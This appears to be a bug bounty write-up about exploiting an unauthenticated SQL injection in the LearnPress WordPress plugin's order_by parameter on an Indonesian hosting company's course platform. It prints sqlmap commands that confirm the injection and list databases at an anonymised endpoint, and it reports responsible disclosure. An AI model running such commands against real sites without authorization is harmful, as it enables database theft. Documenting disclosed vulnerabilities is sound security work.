Critical SQL Injection in a Major Indonesian Web Hosting Platform

While exploring vulnerabilities in a major web hosting company in Indonesia, I discovered a critical SQL injection vulnerability in their online course platform. Although I am unable to disclose the company name or specific platform, this writeup outlines the discovery process and demonstrates the impact of the vulnerability.

I accessed the website and identified that it used WordPress with the LearnPress plugin. Upon further investigation, I found that their LearnPress plugin was outdated and vulnerable to SQL injection. According to Wordfence, the affected versions were detailed as:

• Title: LearnPress <= 4.2.5.7 – Unauthenticated SQL Injection via order_by
• Reference: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by

The Wordfence post highlighted the order_by parameter as the vulnerable entry point. I examined the website and found an API endpoint that used this parameter:

https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular

This endpoint, used for fetching courses via AJAX, was a prime target for SQL injection testing.

To verify the vulnerability, I utilized sqlmap, a powerful SQL injection testing tool. First, I ran a basic scan to confirm the injection point:

./sqlmap -u "https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular*" --random-agent --level=3 --risk=3  

The (*) character after the order_by parameter marks the injection point for sqlmap.

The scan results confirmed that the parameter was vulnerable. Next, I listed the available databases to assess the extent of the compromise: bash Copy code

./sqlmap -u "https://example.com/wp-json/lp/v1/courses/archive-course?order_by=popular*" --random-agent --level=3 --risk=3 --dbs  

Result:

Upon confirming the vulnerability, I immediately reported it to the company. Recognizing the severity of the issue, they promptly acknowledged the report and rewarded me with 3 months of free hosting as a token of appreciation for identifying and responsibly disclosing the critical SQL injection vulnerability.

Related Articles

If you’re interested in more bug bounty stories, check out my writeups on vulnerabilities in other Indonesian web hosting platforms:

• POST-based XSS on DomaiNesia
• Reflected DOM-based XSS on DomaiNesia
• $1.000 IDOR @ Indonesian Webhost

Thank you for reading, and happy hacking!